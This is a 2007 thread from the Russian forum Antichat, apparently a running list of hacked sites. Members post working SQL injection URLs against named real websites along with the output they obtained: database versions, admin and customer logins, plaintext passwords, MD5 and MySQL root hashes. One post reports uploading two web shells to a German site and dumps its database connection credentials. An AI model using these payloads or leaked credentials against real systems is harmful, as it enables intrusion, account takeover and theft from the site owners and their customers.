Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.11.2007, 23:45
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
trouserpress.com
Код:
http://www.trouserpress.com/entry.php?a=8romeo_void'+union+select+1,concat_ws(char(58),version(),user(),database()),3,4+--+&tr=y
4.1.22-standard:trouserp@localhost:trouserp_trouser
hitkaraoke.com
Код:
http://www.hitkaraoke.com/category_search.asp?CATID=186+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db: HIT
user: hitusr1
AdminLogin:
login:dink911
password:sp0ng3b0b
Customers:
Email:dink911@yahoo.com
Password: dink
Админку не нашел
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
09.11.2007, 00:39
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Сеть мебельных центров <<Грэйт>>
Код:
http://www.greatmebel.ru/products/?cat=SQL_INJ
Версия БД - 5.0.45
Админка:
/admin/
Логин: Dimon
Пароль: 11111
Логин: Kostan
Пароль: 99bd7225e7b5f895a36b5833342a3756 (MD5)
|
|
|
|
09.11.2007, 00:59
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Код HTML:
http://www.trubka.ru/cellular/phone.php?id=-1072+UNION+SELECT+1,2,concat(login,0x3b,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+login/*
ДБ 4
нашёл 3 базы admin,news,login
Код HTML:
http://mobila.gipershop.net.ua/descript.php?kodmob=493+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*
ДБ 4...чёта таблиц не нашёл
Последний раз редактировалось KEHT33; 09.11.2007 в 01:27..
|
|
|
|
09.11.2007, 02:28
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Код:
http://www.sreda-mag.ru/faq_one.phtml?id=-680+union+select+1,2,3,4,5,6,id,8,9,10,11,12,13,14,15,concat(login,CHAR(58),parol),17,18+from+prepods+where+id=18/*
Нужно перебирать id.
Код:
http://www.sreda-mag.ru/faq_one.phtml?id=-680+union+select+1,2,3,4,5,6,id,8,9,10,11,12,13,14,15,concat(login,CHAR(58),parol),17,18+from+prepods+where+login<>CHAR(32)+and+login<>CHAR(107,114,97,118,99,104,101,110,107,111)+and+login<>CHAR(100,97,114,105,97)/*
Можно еще таким извратом делать 
Одно но..... пробую входить под получеными данными - нифига не получается, может кто додумает как и что...
Последний раз редактировалось Red_Red1; 09.11.2007 в 14:33..
|
|
|
|
09.11.2007, 03:20
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
http://www.laptopshowcase.co.uk/downloads.php?id=1
Подобирать столбцы необходимо с помошью group+by
Код:
Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
В итоге правельным будет следующий запрос
_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,version(),4,5,6,7,8 ,9,0,11/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
09.11.2007, 08:27
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
italia.allaboutjazz.com
Код:
http://italia.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,version(),database(),user()),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70/*
4.1.20:italy:vxweb@www.allaboutjazz.com
доступ к mysql.user закрыт
|
|
|
|
09.11.2007, 13:11
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
media.uoa.gr
Код:
http://www.media.uoa.gr/yasmin/viewtopic.php?t=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14/*
4.0.21:yasmin:nobody@localhost
root:
Код:
http://www.media.uoa.gr/yasmin/viewtopic.php?t=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
root:13a2d19842b1bd5c
|
|
|
|
09.11.2007, 15:26
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
medizin-controller.de
Код:
http://www.medizin-controller.de/news.php?id_news=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
5.0.32-Debian_7etch1~bpo.1-log:medizincontroller_de:ftp25366@hydrogen.webpack .hosteurope.de
56 таблиц:
Код:
http://www.medizin-controller.de/news.php?id_news=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+55,1/*
залил два shell-a:
Код:
http://www.medizin-controller.de/archiv/sh.php
Код:
http://www.medizin-controller.de/archiv/rsh.php
данные из connect.php:
$server = "mysql5.webpack.hosteurope.de";
$user = "ftp25366";
$pass = "avatar";
$db = "medizincontroller_de";
|
|
|
|
09.11.2007, 16:03
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478
Репутация:
999
|
|
http://www.energyfm.ru/?an=nrj_scroll2'&nostat='
Если кто подберёт, скинте.
104.2 fm в МСК.
|
|
|
|
09.11.2007, 17:14
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
Сообщение от -Hormold-
Если кто подберёт, скинте.
104.2 fm в МСК.
зачем?
можешь почитать оч. старое сообщение ZaCo /https://antichat.ru/printthread.php?t=10601&pp=40/, эту дурку ещё не прикрыли, там по памяти он даже видео снял.
вот тебе для проверки http://www.energyfm.ru/?an=foto_slu&condition=czIgbGlrZSAnbm9fbmFtZScgdW5 pb24gc2VsZWN0IDEsMix2ZXJzaW9uKCksNCw1LDYsNyw4LDksM CwxLDIsMyw0LDUsNiw3LDgsOSwwLDEsMiwzLDQsNSw2LDcsOCw 5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
